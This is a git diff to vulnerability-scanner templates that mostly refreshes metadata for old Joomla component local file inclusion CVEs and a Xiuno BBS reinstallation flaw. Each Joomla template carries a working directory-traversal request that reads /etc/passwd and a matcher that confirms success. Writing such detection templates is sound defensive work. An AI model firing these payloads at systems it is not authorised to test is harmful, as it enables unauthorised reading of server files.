diff --git a/cnvd/2019/CNVD-2019-01348.yaml b/cnvd/2019/CNVD-2019-01348.yaml index b59ca55953..3ba843544c 100644 --- a/cnvd/2019/CNVD-2019-01348.yaml +++ b/cnvd/2019/CNVD-2019-01348.yaml @@ -3,15 +3,15 @@ id: CNVD-2019-01348 info: name: Xiuno BBS CNVD-2019-01348 author: princechaddha - severity: medium - description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page. + severity: high + description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. + remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product. reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 tags: xiuno,cnvd,cnvd2019 - remediation: There is currently no patch available. classification: - cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 6.5 - cwe-id: CWE-276 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml index 904655afb1..829aa8ee2e 100644 --- a/cves/2010/CVE-2010-1219.yaml +++ b/cves/2010/CVE-2010-1219.yaml 
@@ -3,24 +3,24 @@ info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11757 - https://www.cvedetails.com/cve/CVE-2010-1219 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1219 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml index 90c52b2f83..5e511423dd 100644 --- a/cves/2010/CVE-2010-1302.yaml +++ b/cves/2010/CVE-2010-1302.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1302 - info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11978 - https://www.cvedetails.com/cve/CVE-2010-1302 tags: cve,cve2010,joomla,lfi,graph - + classification: + cve-id: CVE-2010-1302 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml index bacd107b78..b1f84a47d8 100644 --- a/cves/2010/CVE-2010-1304.yaml +++ b/cves/2010/CVE-2010-1304.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1304 - info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11998 - https://www.cvedetails.com/cve/CVE-2010-1304 tags: cve,cve2010,joomla,lfi,status - + classification: + cve-id: CVE-2010-1304 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml index ca2155a2d3..e91f43a176 100644 --- a/cves/2010/CVE-2010-1305.yaml +++ b/cves/2010/CVE-2010-1305.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1305 - info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12065 - https://www.cvedetails.com/cve/CVE-2010-1305 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1305 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml index 7a3b6a6390..3641751664 100644 --- a/cves/2010/CVE-2010-1306.yaml +++ b/cves/2010/CVE-2010-1306.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1306 - info: name: Joomla! Component Picasa 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12058 - https://www.cvedetails.com/cve/CVE-2010-1306 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1306 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml index 70c1ac485f..633f6e123e 100644 --- a/cves/2010/CVE-2010-1307.yaml +++ b/cves/2010/CVE-2010-1307.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1307 - info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12070 - https://www.cvedetails.com/cve/CVE-2010-1307 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1307 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml index 991bc53f66..b6c51876dc 100644 --- a/cves/2010/CVE-2010-1308.yaml +++ b/cves/2010/CVE-2010-1308.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1308 - info: name: Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12066 - https://www.cvedetails.com/cve/CVE-2010-1308 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1308 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml index 022a54afd8..9233b469f2 100644 --- a/cves/2010/CVE-2010-1312.yaml +++ b/cves/2010/CVE-2010-1312.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1312 - info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12077 - https://www.cvedetails.com/cve/CVE-2010-1312 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1312 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml index 46a6e36549..96ae1278d6 100644 --- a/cves/2010/CVE-2010-1313.yaml +++ b/cves/2010/CVE-2010-1313.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1313 - info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12082 - https://www.cvedetails.com/cve/CVE-2010-1313 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1313 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml index 0d487cfbda..ff7709f567 100644 --- a/cves/2010/CVE-2010-1314.yaml +++ b/cves/2010/CVE-2010-1314.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1314 - info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12086 - https://www.cvedetails.com/cve/CVE-2010-1314 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1314 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml index 43663eef51..f092a50a5f 100644 --- a/cves/2010/CVE-2010-1315.yaml +++ b/cves/2010/CVE-2010-1315.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1315 - info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11999 - https://www.cvedetails.com/cve/CVE-2010-1315 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1315 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml index d369a9ddb3..c4118e5a30 100644 --- a/cves/2010/CVE-2010-1340.yaml +++ b/cves/2010/CVE-2010-1340.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1340 - info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/33797 - https://www.cvedetails.com/cve/CVE-2010-1340 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1340 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml index 814e4ab08a..e6b24ac290 100644 --- a/cves/2010/CVE-2010-1345.yaml +++ b/cves/2010/CVE-2010-1345.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1345 - info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/15453 - https://www.cvedetails.com/cve/CVE-2010-1345 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1345 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml index 5dd77fa70f..02a8b12919 100644 --- a/cves/2010/CVE-2010-1352.yaml +++ b/cves/2010/CVE-2010-1352.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1352 - info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12084 - https://www.cvedetails.com/cve/CVE-2010-1352 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1352 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml index cde20e6951..ec104f73bf 100644 --- a/cves/2010/CVE-2010-1353.yaml +++ b/cves/2010/CVE-2010-1353.yaml 
@@ -1,27 +1,26 @@ id: CVE-2010-1353 - info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12068 - https://www.cvedetails.com/cve/CVE-2010-1353 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1353 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml index 2b37852cfc..5f15b0d0fd 100644 --- a/cves/2010/CVE-2010-1354.yaml +++ b/cves/2010/CVE-2010-1354.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12102 - https://www.cvedetails.com/cve/CVE-2010-1354 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1354 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml index 1e3d3663a4..4761cca35f 100644 --- a/cves/2010/CVE-2010-1461.yaml +++ b/cves/2010/CVE-2010-1461.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 tags: cve,cve2010,joomla,lfi,photo + classification: + cve-id: CVE-2010-1461 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml index d06c195c18..b0917eaf3e 100644 --- a/cves/2010/CVE-2010-1469.yaml +++ b/cves/2010/CVE-2010-1469.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/12146 - https://www.cvedetails.com/cve/CVE-2010-1469 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1469 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml index bcb3e84703..a03a26ef47 100644 --- a/cves/2010/CVE-2010-1470.yaml +++ b/cves/2010/CVE-2010-1470.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Web TV 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12166 - https://www.cvedetails.com/cve/CVE-2010-1470 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1470 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml index b68e50d8b6..6fde5e2454 100644 --- a/cves/2010/CVE-2010-1471.yaml +++ b/cves/2010/CVE-2010-1471.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Address Book 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12170 - https://www.cvedetails.com/cve/CVE-2010-1471 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1471 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml index 4294244baf..4d3b6f55d4 100644 --- a/cves/2010/CVE-2010-1472.yaml +++ b/cves/2010/CVE-2010-1472.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12167 - https://www.cvedetails.com/cve/CVE-2010-1472 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1472 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml index c2e7878067..dba720eb65 100644 --- a/cves/2010/CVE-2010-1473.yaml +++ b/cves/2010/CVE-2010-1473.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12171 - https://www.cvedetails.com/cve/CVE-2010-1473 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1473 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml index bad1b8ef59..0aacde798e 100644 --- a/cves/2010/CVE-2010-1474.yaml +++ b/cves/2010/CVE-2010-1474.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12182 - https://www.cvedetails.com/cve/CVE-2010-1474 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1474 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml index 44a2dd1650..d3dd2ec1d3 100644 --- a/cves/2010/CVE-2010-1475.yaml +++ b/cves/2010/CVE-2010-1475.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12147 - https://www.cvedetails.com/cve/CVE-2010-1475 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1475 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml index c1718acac9..e858a1b0b3 100644 --- a/cves/2010/CVE-2010-1476.yaml +++ b/cves/2010/CVE-2010-1476.yaml 
